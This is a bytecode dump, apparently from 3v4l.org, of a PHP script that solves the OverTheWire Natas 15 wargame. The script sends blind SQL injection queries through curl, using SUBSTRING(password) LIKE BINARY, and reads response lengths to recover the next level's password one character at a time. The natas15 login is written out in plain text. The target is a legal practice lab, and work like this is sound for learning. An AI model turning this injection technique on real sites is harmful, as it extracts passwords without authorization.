Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 42) Position 1 = 65 Branch analysis from position: 65 2 jumps found. (Code = 44) Position 1 = 67, Position 2 = 10 Branch analysis from position: 67 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 10 1 jumps found. (Code = 42) Position 1 = 62 Branch analysis from position: 62 2 jumps found. (Code = 44) Position 1 = 64, Position 2 = 12 Branch analysis from position: 64 2 jumps found. (Code = 44) Position 1 = 67, Position 2 = 10 Branch analysis from position: 67 Branch analysis from position: 10 Branch analysis from position: 12 2 jumps found. (Code = 43) Position 1 = 55, Position 2 = 61 Branch analysis from position: 55 2 jumps found. (Code = 44) Position 1 = 64, Position 2 = 12 Branch analysis from position: 64 Branch analysis from position: 12 Branch analysis from position: 61 filename: /in/M3saJ function name: (null) number of ops: 70 compiled vars: !0 = $chars, !1 = $credentials, !2 = $ch, !3 = $pass, !4 = $target, !5 = $needle, !6 = $xx, !7 = $yy, !8 = $char, !9 = $target2, !10 = $page line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 8 0 E > ASSIGN !0, '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' 9 1 ASSIGN !1, 'natas15%3Am2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV' 10 2 INIT_FCALL_BY_NAME 'curl_init' 3 DO_FCALL 0 $13 4 ASSIGN !2, $13 11 5 ASSIGN !3, '' 12 6 ASSIGN !4, 'natas15.natas.labs.overthewire.org%2Findex.php' 13 7 ASSIGN !5, 'r+e' 14 8 ASSIGN !6, 1 9 > JMP ->65 15 10 > ASSIGN !7, 0 11 > JMP ->62 17 12 > INIT_FCALL 'substr' 13 SEND_VAR !0 14 SEND_VAR !7 15 SEND_VAL 1 16 DO_ICALL $20 17 ASSIGN !8, $20 18 18 ROPE_INIT 3 ~23 '%3Fusername%3Dnatas16%22+and+SUBSTRING%28password%2C' 19 ROPE_ADD 1 ~23 ~23, !6 20 ROPE_END 2 ~22 ~23, '%2C1%29+LIKE+BINARY+%22' 21 CONCAT ~25 !4, ~22 22 CONCAT ~26 ~25, !8 23 ASSIGN !9, ~26 19 24 CONCAT ~28 '%0A', !9 25 CONCAT ~29 ~28, '%0A' 26 ECHO ~29 20 27 INIT_FCALL_BY_NAME 'curl_setopt' 28 SEND_VAR_EX !2 29 FETCH_CONSTANT ~30 'CURLOPT_URL' 30 SEND_VAL_EX ~30 31 SEND_VAR_EX !9 32 DO_FCALL 0 21 33 INIT_FCALL_BY_NAME 'curl_setopt' 34 SEND_VAR_EX !2 35 FETCH_CONSTANT ~32 'CURLOPT_USERPWD' 36 SEND_VAL_EX ~32 37 SEND_VAR_EX !1 38 DO_FCALL 0 22 39 INIT_FCALL_BY_NAME 'curl_setopt' 40 SEND_VAR_EX !2 41 FETCH_CONSTANT ~34 'CURLOPT_RETURNTRANSFER' 42 SEND_VAL_EX ~34 43 SEND_VAL_EX <true> 44 DO_FCALL 0 23 45 INIT_FCALL_BY_NAME 'curl_exec' 46 SEND_VAR_EX !2 47 DO_FCALL 0 $36 48 ASSIGN !10, $36 24 49 STRLEN ~38 !10 50 CONCAT ~39 '%0A', ~38 51 ECHO ~39 25 52 STRLEN ~40 !10 53 IS_SMALLER ~40, 288 54 > JMPZ ~41, ->61 27 55 > CONCAT ~42 !3, !8 56 ASSIGN !3, ~42 28 57 CONCAT ~44 '%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0ALa+pass+per+ora+e%27%3A+', !3 58 CONCAT ~45 ~44, '%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A' 59 ECHO ~45 29 60 ASSIGN !7, 62 15 61 > PRE_INC !7 62 > IS_SMALLER !7, 62 63 > JMPNZ ~48, ->12 14 64 > PRE_INC !6 65 > IS_SMALLER !6, 33 66 > JMPNZ ~50, ->10 33 67 > CONCAT ~51 '%0ALa+password+e%27%3A+', !3 68 ECHO ~51 35 69 > RETURN 1
Generated using Vulcan Logic Dumper, using php 8.0.0